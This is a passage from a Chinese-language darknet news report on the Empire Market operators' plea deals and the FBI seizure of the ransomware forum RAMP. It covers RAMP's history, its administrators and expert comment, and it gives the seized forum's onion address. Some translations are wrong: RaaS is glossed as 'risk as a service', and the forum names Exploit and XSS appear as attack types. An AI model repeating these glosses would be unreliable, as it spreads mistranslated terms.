检察官表示,“帝国市场”(Empire Market)是同类暗网市场中规模最大的暗网市场之一,拥有超过160万独立注册用户和400万笔独立交易,其中毒品销售是最普遍的活动。2020年夏天,“帝国市场”突然关闭无法访问,当时“暗网下/AWX”进行了报道,并认为该暗网市场的关闭是“退出骗局”。据估计,运营者从用户那里窃取了价值3000万美元的比特币。
作为认罪协议的一部分,汉密尔顿同意放弃部分非法所得,其中包括约1230枚比特币、24.4枚以太坊以及位于弗吉尼亚州的三处房产。
现年40岁、居住在佛罗里达州奥蒙德海滩的帕维去年承认犯有联邦毒品共谋罪,并承认参与创建和运营帝国市场。帕维目前正在等待判决,他将面临与汉密尔顿相同的最高刑期。作为认罪协议的一部分,帕维同意放弃部分非法所得,其中包括约1584枚比特币、两箱25盎司金条、三辆汽车以及位于佛罗里达州的两处房产。
“帝国市场”(Empire Market)是在臭名昭著的AlphaBay Market于2017年被查封后兴起的,其创始人Hamilton(又名“Sydney”和“ZeroAngel”)和Pavey(又名“Dopenugget”)的网站正是模仿AlphaBay的模式。2024年,检方宣布对Hamilton和Pavey提起诉讼,称他们曾在AlphaBay Market上出售假美元。
自AlphaBay Market被查封以来,美国政府和国际执法部门针对暗网交易市场与网络犯罪论坛的执法打击行动一直在持续进行。 正如本站昨天报道,FBI已经查封了俄罗斯知名暗网论坛RAMP。
在美国联邦调查局(FBI)的努力下,臭名昭著的俄罗斯暗网论坛RAMP的暗网和明网网站已被美国执法部门查封。RAMP,即“俄罗斯匿名市场”(Russian Anonymous Marketplace)的缩写,是一个以俄语为主的在线交易平台,自称是“唯一允许勒索软件存在的地方”,深受勒索软件即服务团伙、敲诈勒索者、初始访问经纪人和其他从事网络犯罪的不法分子青睐的
在其他一些论坛(例如XSS)被查封后,RAMP已成为少数几个仍能逍遥法外的网络犯罪论坛之一。XSS的领导人去年被欧洲刑警组织逮捕。这一真空使得RAMP成为传播勒索软件和其他网络威胁的人员买卖或交易产品和服务的主要场所之一。
美国联邦调查局 (FBI) 与佛罗里达州南区联邦检察官办公室和司法部计算机犯罪与知识产权部门协调,执行了此次查封行动。目前访问RAMP的暗网Tor域名(rampjcdlqvgkoz5oywutpo6ggl7g6tvddysustfl6qzhr5osr24xxqqd[.]onion)及其明网域名(ramp4u[.]io),两个域名显示内容完全相同,为一个醒目的页面,页面显示执法部门的横幅广告,上面写着:“本网站已被查封”,意味着FBI已接管RAMP的域名。
扣押横幅上写着,FBI与美国佛罗里达州南区检察官办公室和美国司法部(DoJ)计算机犯罪和知识产权科(CCIPS)合作查封了该网站。该通知还嘲讽了RAMP运营商,上面写着“勒索软件唯一允许的地方!”,并配上了一张俄罗斯卡通人物玛莎(俄罗斯热门儿童动画片《玛莎和熊》中眨眼的玛莎)眨眼的图片。这份扣押横幅上没有像其他类似行动那样印有任何其他国际执法机构的标志,只列出了FBI和司法部的印章,似乎强调本次查封是美国当局独立完成的。
经“暗网下/AWX”测试,RAMP明网网站的域名服务器(DNS)记录已经重定向到FBI经常用于打击非法活动的域名服务器:
Name Server: ns1.fbi.seized.gov
Name Server: ns2.fbi.seized.gov 由于RAMP的暗网域名也被查封,本站(anwangxia.com)认为,FBI应已获取了RAMP论坛用户数据库和其他敏感的网站信息,如电子邮件地址、IP地址、私人消息和其他可能构成犯罪证据的信息,也就意味着经常访问与使用该网站的用户可能会被执法部门追踪到。
目前尚无任何关于RAMP运营者或用户被捕或拘留的消息。查封通知邀请公众通过FBI的IC3门户网站提交线索。
RAMP的查封行动与此前针对其他网络犯罪论坛的类似行动相呼应,表明执法部门正持续努力打击犯罪基础设施。虽然官方尚未确认任何逮捕行动,但此次行动凸显了勒索软件即服务(RaaS)运营及其相关生态系统面临的日益严峻的压力。
RAMP宣称是唯一允许勒索软件传播的暗网论坛 RAMP于2012年创建,最初是一个运行在Tor网络上的暗网网站,但直到2021年才开始声名鹊起,其运营者与现已解散的Babuk勒索软件团伙有关联。RAMP论坛目前的形态是在XSS和Exploit(俄罗斯网络犯罪领域两大主要暗网论坛)以及英语论坛BreachForums禁止讨论勒索软件之后形成的。
RAMP(俄罗斯匿名市场)宣称是暗网上唯一能允许勒索软件的论坛,该平台服务于俄语、中文和英语用户,拥有超过14000名注册用户,尤其受到勒索软件组织及其附属机构的青睐。所有用户在注册前都经过严格审核,或支付500美元匿名参与。该论坛提供讨论组、网络攻击教程以及恶意软件和服务市场。其首席管理员表示,该网站在2024年的年收入为25万美元。
RAMP最初旨在连接勒索软件运营者、关联方和中间商,如今已发展成为勒索软件生态系统的核心枢纽,成为威胁行为者协作、招募和交易的场所。目前RAMP不仅仅是一个交流平台,它更是一个勒索软件市场,DragonForce、Qilin、Medusa、GLOBAL Group、Eldorado和LockBit等勒索软件团伙都在此活跃。这些团伙积极招募技术娴熟的成员,宣传新的勒索软件变种,并共享行动情报,所有这些都是为了扩大自身的影响力和能力。
RAMP论坛的管理员中有一位名叫米哈伊尔·马特维耶夫(Mikhail Matveev)的俄罗斯公民,他也使用过Orange、Wazawaka和BorisElcin等化名,他于2022年表示,已经该论坛的所有权将转移给一位名叫“Stallman”的黑客。马特维耶夫于2024年在俄罗斯被捕。
2023年,马特维耶夫因参与多起勒索软件攻击活动(包括Babuk、LockBit和Hive)而被美国司法部起诉,这些攻击的目标是美国医疗保健机构、执法机构和其他关键基础设施。他还受到美国财政部外国资产控制办公室的制裁,并被列入联邦调查局的通缉名单,美国国务院悬赏高达1000万美元,征集能够逮捕或定罪他的信息。
网名为“Stallman”的黑客在RAMP论坛被关闭时仍然是该论坛的管理员,网络安全情报显示,Stallman“在维护信任、执行规则和管理平台的技术运营方面发挥了核心作用”。
在被查封后,情报公司Red Sense的联合创始人Yelisey Bohuslavskiy在LinkedIn上发帖解释说,RAMP是由与俄罗斯安全部门关系密切的人员创建的,目的是为了应对勒索软件即服务(RaaS)的蔓延。
他表示,直到2020年,俄罗斯、白俄罗斯和乌克兰的执法部门对Ryuk、Conti、REvil、Maze、Ragnar、Netwalker等传统且组织严密的网络犯罪集团都有很强的可见性。
“这种可见性部分来自于安全相关管理员对漏洞利用和跨站脚本攻击的控制。随后,RaaS(风险即服务)呈爆炸式增长。这种模式失控地蔓延:甚至论坛管理员也对关联方完全没有控制权。而RAMP正是为了解决这个问题而开发的,”他补充道。
据专家称,RAMP是新兴的、中低层级的勒索软件组织宣传自身、提供服务并“尽可能提高知名度”的主要中心。
Flare的高级威胁情报研究员Tammy Harper将RAMP描述为“网络犯罪生态系统中最值得信赖的勒索软件相关论坛之一”。
她解释说,该平台“被广泛认为是一个高度可信的托管环境”,并且是勒索软件运营商、中间人和关联方的主要讨论中心。
CybaVerse的安全运营中心 (SOC) 经理Ben Clarke解释说,RAMP成功的原因是“它为犯罪分子提供了一个支持整个攻击链的市场,从购买被盗凭证、推广恶意软件到出售和购买勒索软件服务。”
据了解,包括LockBit、ALPHV/BlackCat、Conti、DragonForce、Qilin、Nova、Radiant和RansomHub在内的许多臭名昭著的勒索软件组织都曾在不同时期在这个论坛上活动过。
Stallman承认FBI已经控制RAMP论坛,暂无重建计划 THE RAMP ADMINISTRATOR CONFIRMED THE ATTACK. A user with the nickname Stallman on the forum XSS confirmed that the forum administration had lost control. Here is the text of the statement: To whom it may concern.